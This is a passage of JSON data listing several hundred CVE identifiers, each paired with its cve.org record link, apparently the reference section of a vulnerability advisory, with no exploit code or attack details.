"name": "CVE-2025-40310",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40310"
},
{
"name": "CVE-2022-50697",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50697"
},
{
"name": "CVE-2022-50733",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50733"
},
{
"name": "CVE-2025-40083",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40083"
},
{
"name": "CVE-2025-71111",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71111"
},
{
"name": "CVE-2026-22985",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22985"
},
{
"name": "CVE-2023-54006",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54006"
},
{
"name": "CVE-2023-53784",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53784"
},
{
"name": "CVE-2023-54084",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54084"
},
{
"name": "CVE-2025-68802",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68802"
},
{
"name": "CVE-2023-54067",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54067"
},
{
"name": "CVE-2022-50731",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50731"
},
{
"name": "CVE-2023-54264",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54264"
},
{
"name": "CVE-2025-40154",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40154"
},
{
"name": "CVE-2025-40331",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40331"
},
{
"name": "CVE-2025-68337",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68337"
},
{
"name": "CVE-2025-68351",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68351"
},
{
"name": "CVE-2023-54304",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54304"
},
{
"name": "CVE-2022-50851",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50851"
},
{
"name": "CVE-2022-50615",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50615"
},
{
"name": "CVE-2025-71131",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71131"
},
{
"name": "CVE-2025-40149",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40149"
},
{
"name": "CVE-2022-50704",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50704"
},
{
"name": "CVE-2023-53747",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53747"
},
{
"name": "CVE-2025-40164",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40164"
},
{
"name": "CVE-2022-50730",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50730"
},
{
"name": "CVE-2023-54125",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54125"
},
{
"name": "CVE-2022-50617",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50617"
},
{
"name": "CVE-2023-54173",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54173"
},
{
"name": "CVE-2023-53751",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53751"
},
{
"name": "CVE-2023-53743",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53743"
},
{
"name": "CVE-2022-50656",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50656"
},
{
"name": "CVE-2025-71116",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71116"
},
{
"name": "CVE-2023-54036",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54036"
},
{
"name": "CVE-2023-54190",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54190"
},
{
"name": "CVE-2022-49604",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49604"
},
{
"name": "CVE-2023-53842",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53842"
},
{
"name": "CVE-2025-68208",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68208"
},
{
"name": "CVE-2025-68362",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68362"
},
{
"name": "CVE-2022-50823",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50823"
},
{
"name": "CVE-2023-53412",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53412"
},
{
"name": "CVE-2022-50719",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50719"
},
{
"name": "CVE-2022-50703",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50703"
},
{
"name": "CVE-2022-50763",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50763"
},
{
"name": "CVE-2025-40300",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40300"
},
{
"name": "CVE-2022-50727",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50727"
},
{
"name": "CVE-2022-50629",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50629"
},
{
"name": "CVE-2023-53762",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53762"
},
{
"name": "CVE-2022-50872",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50872"
},
{
"name": "CVE-2025-68290",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68290"
},
{
"name": "CVE-2025-40280",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40280"
},
{
"name": "CVE-2025-71162",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71162"
},
{
"name": "CVE-2025-40180",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40180"
},
{
"name": "CVE-2025-40293",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40293"
},
{
"name": "CVE-2025-68750",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68750"
},
{
"name": "CVE-2023-54127",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54127"
},
{
"name": "CVE-2023-53861",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53861"
},
{
"name": "CVE-2025-68803",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68803"
},
{
"name": "CVE-2026-22996",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22996"
},
{
"name": "CVE-2023-54197",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54197"
},
{
"name": "CVE-2025-68331",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68331"
},
{
"name": "CVE-2023-54137",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54137"
},
{
"name": "CVE-2023-54244",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54244"
},
{
"name": "CVE-2026-22976",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22976"
},
{
"name": "CVE-2023-54319",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54319"
},
{
"name": "CVE-2025-68305",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68305"
},
{
"name": "CVE-2022-50845",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50845"
},
{
"name": "CVE-2025-40320",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40320"
},
{
"name": "CVE-2022-50754",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50754"
},
{
"name": "CVE-2025-68753",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68753"
},
{
"name": "CVE-2023-54140",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54140"
},
{
"name": "CVE-2022-50856",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50856"
},
{
"name": "CVE-2025-68775",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68775"
},
{
"name": "CVE-2025-71112",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71112"
},
{
"name": "CVE-2023-54285",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54285"
},
{
"name": "CVE-2023-54055",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54055"
},
{
"name": "CVE-2023-54025",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54025"
},
{
"name": "CVE-2023-53991",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53991"
},
{
"name": "CVE-2023-54229",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54229"
},
{
"name": "CVE-2022-50861",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50861"
},
{
"name": "CVE-2022-50882",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50882"
},
{
"name": "CVE-2025-40200",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40200"
},
{
"name": "CVE-2023-54300",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54300"
},
{
"name": "CVE-2025-39880",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39880"
},
{
"name": "CVE-2023-54042",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54042"
},
{
"name": "CVE-2022-50832",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50832"
},
{
"name": "CVE-2023-53807",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53807"
},
{
"name": "CVE-2022-50638",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50638"
},
{
"name": "CVE-2025-40102",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40102"
},
{
"name": "CVE-2023-54302",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54302"
},
{
"name": "CVE-2025-40170",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40170"
},
{
"name": "CVE-2023-53811",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53811"
},
{
"name": "CVE-2025-40160",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40160"
},
{
"name": "CVE-2025-40284",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40284"
},
{
"name": "CVE-2023-54178",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54178"
},
{
"name": "CVE-2023-54051",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54051"
},
{
"name": "CVE-2023-54286",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54286"
},
{
"name": "CVE-2023-54269",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54269"
},
{
"name": "CVE-2025-21765",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21765"
},
{
"name": "CVE-2023-53808",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53808"
},
{
"name": "CVE-2022-50849",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50849"
},
{
"name": "CVE-2025-68366",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68366"
},
{
"name": "CVE-2024-53070",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53070"
},
{
"name": "CVE-2022-50760",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50760"
},
{
"name": "CVE-2023-54008",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54008"
},
{
"name": "CVE-2023-54014",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54014"
},
{
"name": "CVE-2025-68815",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68815"
},
{
"name": "CVE-2022-50858",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50858"
},
{
"name": "CVE-2025-40215",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40215"
},
{
"name": "CVE-2025-40307",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40307"
},
{
"name": "CVE-2025-40111",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40111"
},
{
"name": "CVE-2025-68346",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68346"
},
{
"name": "CVE-2022-50888",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50888"
},
{
"name": "CVE-2025-71163",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71163"
},
{
"name": "CVE-2024-36350",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36350"
},
{
"name": "CVE-2025-40211",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40211"
},
{
"name": "CVE-2025-40042",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40042"
},
{
"name": "CVE-2023-54258",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54258"
},
{
"name": "CVE-2025-39890",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39890"
},
{
"name": "CVE-2025-71096",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71096"
},
{
"name": "CVE-2025-71099",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71099"
},
{
"name": "CVE-2025-71095",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71095"
},
{
"name": "CVE-2022-50640",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50640"
},
{
"name": "CVE-2025-39742",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39742"
},
{
"name": "CVE-2023-54221",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54221"
},
{
"name": "CVE-2025-38352",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38352"
},
{
"name": "CVE-2025-68771",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68771"
},
{
"name": "CVE-2025-68363",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68363"
},
{
"name": "CVE-2025-40248",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40248"
},
{
"name": "CVE-2022-50747",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50747"
},
{
"name": "CVE-2026-22984",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22984"
},
{
"name": "CVE-2025-68303",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68303"
},
{
"name": "CVE-2025-40259",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40259"
},
{
"name": "CVE-2024-36349",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36349"
},
{
"name": "CVE-2023-53827",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53827"
},
{
"name": "CVE-2025-68757",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68757"
},
{
"name": "CVE-2023-54293",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54293"
},
{
"name": "CVE-2025-40329",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40329"
},
{
"name": "CVE-2022-50782",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50782"
},
{
"name": "CVE-2026-22977",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22977"
},
{
"name": "CVE-2022-50826",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50826"
},
{
"name": "CVE-2023-54060",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54060"
},
{
"name": "CVE-2022-48853",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48853"
},
{
"name": "CVE-2022-50635",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50635"
},
{
"name": "CVE-2025-68766",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68766"
},
{
"name": "CVE-2023-53778",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53778"
},
{
"name": "CVE-2023-53746",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53746"
},
{
"name": "CVE-2023-54145",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54145"
},
{
"name": "CVE-2023-54171",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54171"
},
{
"name": "CVE-2022-50749",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50749"
},
{
"name": "CVE-2023-54240",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54240"
},
{
"name": "CVE-2025-40059",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40059"
},
{
"name": "CVE-2022-50618",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50618"
},
{
"name": "CVE-2025-68168",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68168"
},
{
"name": "CVE-2025-71123",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71123"
},
{
"name": "CVE-2025-68206",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68206"
},
{
"name": "CVE-2022-50678",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50678"
},
{
"name": "CVE-2023-54247",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54247"
},
{
"name": "CVE-2025-38684",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38684"
},
{
"name": "CVE-2025-71100",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71100"
},
{
"name": "CVE-2025-68372",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68372"
},
{
"name": "CVE-2023-54070",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54070"
},
{
"name": "CVE-2023-54204",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54204"
},
{
"name": "CVE-2026-23010",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23010"
},
{
"name": "CVE-2025-68313",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68313"
},
{
"name": "CVE-2023-53676",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53676"
},
{
"name": "CVE-2023-53850",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53850"
},
{
"name": "CVE-2025-38209",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38209"
},
{
"name": "CVE-2023-54303",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54303"
},
{
"name": "CVE-2025-71137",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71137"
},
{
"name": "CVE-2025-40123",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40123"
},
{
"name": "CVE-2023-53998",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53998"
},
{
"name": "CVE-2025-68301",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68301"
},
{
"name": "CVE-2026-23011",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23011"
},
{
"name": "CVE-2025-40297",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40297"
},
{
"name": "CVE-2025-68217",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68217"
},
{
"name": "CVE-2025-40178",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40178"
},
{
"name": "CVE-2023-54242",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54242"
},
{
"name": "CVE-2025-68289",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68289"
},
{
"name": "CVE-2025-40363",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40363"
},
{
"name": "CVE-2023-53852",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53852"
},
{
"name": "CVE-2022-50777",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50777"
},
{
"name": "CVE-2025-71156",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71156"
},
{
"name": "CVE-2023-53862",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53862"
},
{
"name": "CVE-2026-22988",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22988"
},
{
"name": "CVE-2022-50664",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50664"
},
{
"name": "CVE-2022-50643",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50643"
},
{
"name": "CVE-2025-68245",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68245"
},
{
"name": "CVE-2025-40317",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40317"
},
{
"name": "CVE-2023-53254",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53254"
},
{
"name": "CVE-2023-54020",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54020"
},
{
"name": "CVE-2023-54135",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54135"
},
{
"name": "CVE-2023-53996",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53996"
},
{
"name": "CVE-2025-68233",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68233"
},
{
"name": "CVE-2025-71120",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71120"
},
{
"name": "CVE-2024-26944",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26944"
},
{
"name": "CVE-2025-38321",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38321"
},
{
"name": "CVE-2025-40316",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40316"
},
{
"name": "CVE-2025-71119",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71119"
},
{
"name": "CVE-2023-54130",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54130"
},
{
"name": "CVE-2023-54314",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54314"
},
{
"name": "CVE-2022-50625",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50625"
},
{
"name": "CVE-2025-68758",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68758"
},
{
"name": "CVE-2024-44987",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-44987"
},
{
"name": "CVE-2025-38539",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38539"
},
{
"name": "CVE-2025-40181",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40181"
},
{
"name": "CVE-2023-54292",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54292"
},
{
"name": "CVE-2023-54172",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54172"
},
{
"name": "CVE-2023-54113",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54113"
},
{
"name": "CVE-2025-40141",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40141"
},
{
"name": "CVE-2025-68340",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68340"
},
{
"name": "CVE-2025-40132",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40132"
},
{
"name": "CVE-2023-53836",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53836"
},
{
"name": "CVE-2022-50232",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50232"
},
{
"name": "CVE-2025-40288",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40288"
},
{
"name": "CVE-2025-68239",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68239"
},
{
"name": "CVE-2025-40258",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40258"
},
{
"name": "CVE-2023-53857",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53857"
},
{
"name": "CVE-2023-53860",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53860"
},
{
"name": "CVE-2025-68185",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68185"
},
{
"name": "CVE-2025-40304",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40304"
},
{
"name": "CVE-2025-40110",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40110"
},
{
"name": "CVE-2023-54169",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54169"
},
{
"name": "CVE-2025-40268",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40268"
},
{
"name": "CVE-2025-39980",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39980"
},
{
"name": "CVE-2023-54281",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54281"
},
{
"name": "CVE-2023-54080",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54080"
},
{
"name": "CVE-2025-68798",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68798"
},
{
"name": "CVE-2023-54294",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54294"
},
{
"name": "CVE-2023-53794",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53794"
},
{
"name": "CVE-2025-68178",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68178"
},
{
"name": "CVE-2025-40337",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40337"
},
{
"name": "CVE-2022-50614",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50614"
},
{
"name": "CVE-2025-40346",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40346"
},
{
"name": "CVE-2023-54050",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54050"
},
{
"name": "CVE-2025-40262",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40262"
},
{
"name": "CVE-2022-50828",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50828"
},
{
"name": "CVE-2025-39813",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39813"
},
{
"name": "CVE-2025-68819",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68819"
},
{
"name": "CVE-2022-50670",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50670"
},
{
"name": "CVE-2023-54022",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54022"
},
{
"name": "CVE-2022-50868",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50868"
},
{
"name": "CVE-2025-40261",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40261"
},
{
"name": "CVE-2025-40030",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40030"
},
{
"name": "CVE-2023-54296",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54296"
},
{
"name": "CVE-2025-40244",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40244"
},
{
"name": "CVE-2025-39819",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39819"
},
{
"name": "CVE-2023-54287",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54287"
},
{
"name": "CVE-2025-68732",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68732"
},
{
"name": "CVE-2022-50876",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50876"
},
{
"name": "CVE-2025-40323",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40323"
},
{
"name": "CVE-2025-68285",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68285"
},
{
"name": "CVE-2022-50652",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50652"
},
{
"name": "CVE-2022-50732",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50732"
},
{
"name": "CVE-2023-54220",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54220"
},
{
"name": "CVE-2023-54198",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54198"
},
{
"name": "CVE-2022-50671",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50671"
},
{
"name": "CVE-2023-54209",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54209"
},
{
"name": "CVE-2022-50653",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50653"
},
{
"name": "CVE-2025-40275",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40275"
},
{
"name": "CVE-2023-54252",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54252"
},
{
"name": "CVE-2023-54019",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54019"
},
{
"name": "CVE-2023-54123",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54123"
},
{
"name": "CVE-2023-54236",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54236"
},
{
"name": "CVE-2025-39829",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39829"
},
{
"name": "CVE-2025-71091",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71091"
},
{
"name": "CVE-2022-50835",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50835"
},
{
"name": "CVE-2023-54189",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54189"
},
{
"name": "CVE-2025-68227",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68227"
},
{
"name": "CVE-2025-40339",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40339"
},
{
"name": "CVE-2023-54260",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54260"
},
{
"name": "CVE-2025-40140",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40140"
},
{
"name": "CVE-2025-21710",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21710"
},
{
"name": "CVE-2025-40223",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40223"
},
{
"name": "CVE-2022-50884",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50884"
},
{
"name": "CVE-2023-54230",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54230"
},
{
"name": "CVE-2023-53831",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53831"
},
{
"name": "CVE-2025-68800",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68800"
},
{
"name": "CVE-2025-68195",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68195"
},
{
"name": "CVE-2025-68261",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68261"
},
{
"name": "CVE-2023-54299",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54299"
},
{
"name": "CVE-2023-53768",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53768"
},
{
"name": "CVE-2025-71149",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71149"
},
{
"name": "CVE-2023-53830",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53830"
},
{
"name": "CVE-2025-40142",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40142"
},
{
"name": "CVE-2022-50850",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50850"
},
{
"name": "CVE-2023-54099",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54099"
},
{
"name": "CVE-2025-40159",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40159"
},
{
"name": "CVE-2025-40319",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40319"
},
{
"name": "CVE-2023-54219",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54219"
},
{
"name": "CVE-2025-68727",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68727"
},
{
"name": "CVE-2023-53847",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53847"
},
{
"name": "CVE-2025-38361",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38361"
},
{
"name": "CVE-2025-39836",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39836"
},
{
